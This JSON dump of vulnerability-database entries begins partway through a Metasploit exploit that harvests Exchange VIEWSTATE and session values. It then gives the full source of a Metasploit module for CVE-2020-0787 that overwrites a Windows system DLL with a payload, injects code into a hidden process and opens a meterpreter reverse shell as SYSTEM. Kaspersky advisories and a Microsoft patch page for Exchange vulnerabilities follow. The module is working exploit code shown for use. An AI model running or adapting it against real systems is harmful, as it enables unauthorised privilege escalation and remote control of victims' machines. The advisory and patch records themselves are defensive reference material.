__VIEWSTATEGENERATOR page') unless res && res.code == 200\r\n cookies << res.get_cookies\r\n\r\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\r\n if viewstate_generator.nil?\r\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\r\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\r\n else\r\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\r\n end\r\n\r\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\r\n if viewstate.nil?\r\n vprint_warning('Failed to find the __VIEWSTATE value')\r\n end\r\n\r\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\r\n if session_id.nil?\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\r\n end\r\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\r\n\r\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\r\n end\r\nend\n\n# 0day.today [2020-03-05] #", "sourceHref": "https://0day.today/exploit/34051", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T13:40:00", "description": "This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking issue within the Update Session Orchestrator Service. Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, so your mileage may vary on Windows Server 2016 and later.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-12T00:00:00", "type": "zdt", "title": "Background Intelligent Transfer Service Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787", "CVE-2020-0688"], "modified": "2020-06-12T00:00:00", "id": "1337DAY-ID-34553", "href": "https://0day.today/exploit/description/34553", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n include Msf::Post::Windows::FileSystem\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability',\n 'Description' => %q{\n This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'itm4n', # PoC\n 'gwillcox-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' =>\n [\n ['CVE', '2020-0787'],\n ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],\n ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],\n ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],\n ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],\n ['URL', 'https://itm4n.github.io/usodllloader-part1/'],\n ['URL', 'https://itm4n.github.io/usodllloader-part2/'],\n ],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 900\n }\n )\n )\n\n register_options([\n OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]),\n OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20])\n ])\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n build_num_raw = session.shell_command_token('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n print_error(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n print_status(\"Target's build number: #{build_num}\")\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n build_num_gemversion = Gem::Version.new(build_num)\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def check_target_is_running_supported_windows_version\n if sysinfo['OS'].match('Windows').nil?\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?\n fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def check_target_and_payload_match_and_supported(client_arch)\n if (client_arch != ARCH_X64) && (client_arch != ARCH_X86)\n fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!')\n end\n payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.\n if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86)\n fail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error.\n end\n if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86))\n fail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\")\n end\n end\n\n def check_windowscoredeviceinfo_dll_exists_on_target\n # Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code.\n #\n # We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit.\n # The second part of this exploit will trigger a Update Session to be created so that this DLL\n # is loaded, which will result in arbitrary code execution as SYSTEM.\n #\n # To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure\n # that they want to overwrite the file.\n win_dir = session.sys.config.getenv('windir')\n normal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\"\n wow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\"\n wow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\"\n if file?(wow64_existing_file)\n if file?(wow64_target_payload_pathname)\n print_warning(\"#{wow64_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n end\n target_payload_pathname = wow64_target_payload_pathname\n elsif file?(normal_target_payload_pathname)\n print_warning(\"#{normal_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n target_payload_pathname = normal_target_payload_pathname\n end\n target_payload_pathname\n end\n\n def launch_background_injectable_notepad\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n process\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n process\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n client_arch = sysinfo['Architecture']\n check_target_is_running_supported_windows_version\n check_target_and_payload_match_and_supported(client_arch)\n check_windowscoredeviceinfo_dll_exists_on_target\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n print_status('Step #2: Generating the malicious DLL...')\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787')\n datastore['EXE::Path'] = path\n if client_arch =~ /x86/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll')\n library_path = ::File.expand_path(library_path)\n elsif client_arch =~ /x64/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll')\n library_path = ::File.expand_path(library_path)\n end\n\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll'\n write_file(malicious_dll_location, payload_dll)\n register_file_for_cleanup(malicious_dll_location)\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n process = launch_background_injectable_notepad\n\n print_status(\"Injecting DLL into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n dll_info_parameter = malicious_dll_location.to_s\n payload_mem = inject_into_process(process, dll_info_parameter)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('DLL injected. Executing injected DLL...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\")\n sleep datastore['JOB_WAIT_TIME']\n\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.\n # Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file.\n\n print_status(\"Starting the interactive scan job...\")\n # Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n session.shell_command_token('usoclient StartInteractiveScan')\n\n print_status(\"Enjoy the shell!\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/34553", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:00:36", "description": "### *Detect date*:\n09/08/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nUnspecified vulnerability was found in Microsoft Exchange Server. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 5 \nMicrosoft Exchange Server 2016 Cumulative Update 16 \nMicrosoft Exchange Server 2019 Cumulative Update 6 \nMicrosoft Exchange Server 2016 Cumulative Update 17\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16875](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16875>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2020-16875](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16875>)9.0Critical\n\n### *KB list*:\n[4577352](<http://support.microsoft.com/kb/4577352>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-08T00:00:00", "type": "kaspersky", "title": "KLA11955 ACE vulnerability in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-10T00:00:00", "id": "KLA11955", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11955/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T18:17:04", "description": "### *Detect date*:\n02/11/2020\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2016 Cumulative Update 14 \nMicrosoft Exchange Server 2016 Cumulative Update 15 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2010 Service Pack 3 Update Rollup 30 \nMicrosoft Exchange Server 2019 Cumulative Update 4 \nMicrosoft Exchange Server 2019 Cumulative Update 3\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0692](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0692>) \n[CVE-2020-0688](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0688>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2020-0692](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0692>)6.8High \n[CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>)9.0Critical\n\n### *KB list*:\n[4536988](<http://support.microsoft.com/kb/4536988>) \n[4536989](<http://support.microsoft.com/kb/4536989>) \n[4536987](<http://support.microsoft.com/kb/4536987>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T00:00:00", "type": "kaspersky", "title": "KLA11664 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0692"], "modified": "2022-01-18T00:00:00", "id": "KLA11664", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11664/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T10:59:22", "description": "### *Detect date*:\n12/08/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 18 \nMicrosoft Exchange Server 2016 Cumulative Update 17 \nMicrosoft Exchange Server 2010 Service Pack 3 Update Rollup 31 \nMicrosoft Exchange Server 2019 Cumulative Update 7 \nMicrosoft Exchange Server 2019 Cumulative Update 6\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-17132](<https://nvd.nist.gov/vuln/detail/CVE-2020-17132>) \n[CVE-2020-17117](<https://nvd.nist.gov/vuln/detail/CVE-2020-17117>) \n[CVE-2020-17144](<https://nvd.nist.gov/vuln/detail/CVE-2020-17144>) \n[CVE-2020-17141](<https://nvd.nist.gov/vuln/detail/CVE-2020-17141>) \n[CVE-2020-17143](<https://nvd.nist.gov/vuln/detail/CVE-2020-17143>) \n[CVE-2020-17142](<https://nvd.nist.gov/vuln/detail/CVE-2020-17142>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2020-17132](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17132>)6.5High \n[CVE-2020-17117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17117>)9.0Critical \n[CVE-2020-17144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17144>)6.0High \n[CVE-2020-17141](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17141>)6.0High \n[CVE-2020-17143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17143>)6.5High \n[CVE-2020-17142](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17142>)6.5High\n\n### *KB list*:\n[4593466](<http://support.microsoft.com/kb/4593466>) \n[4593465](<http://support.microsoft.com/kb/4593465>) \n[4593467](<http://support.microsoft.com/kb/4593467>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-08T00:00:00", "type": "kaspersky", "title": "KLA12022 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17143", "CVE-2020-17144"], "modified": "2021-02-16T00:00:00", "id": "KLA12022", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12022/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2022-08-10T14:04:56", "description": "None\nThis update rollup is a security update that resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following security advisory:\n\n * [CVE-2020-16875 | Microsoft Exchange Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875>)\n\n## Known issues in this update\n\n * When you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\nThis issue does not occur if you install the update through Microsoft Update.\n * Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\$v=ws.10\$.aspx>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4577352>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2019 Cumulative Update 6 (KB4577352)](<http://www.microsoft.com/download/details.aspx?familyid=4b14aea8-7179-4689-ae09-94da952869ac>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2019 Cumulative Update 5 (KB4577352)](<http://www.microsoft.com/download/details.aspx?familyid=8842cfd3-2585-404b-89e4-1718f67e232c>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2016 Cumulative Update 17 (KB4577352)](<http://www.microsoft.com/download/details.aspx?familyid=589d2f7f-31bf-48c5-aaf2-fc69999097d4>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2016 Cumulative Update 16 (KB4577352)](<http://www.microsoft.com/download/details.aspx?familyid=8af5b070-a354-4ec2-941e-750b154b771f>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment 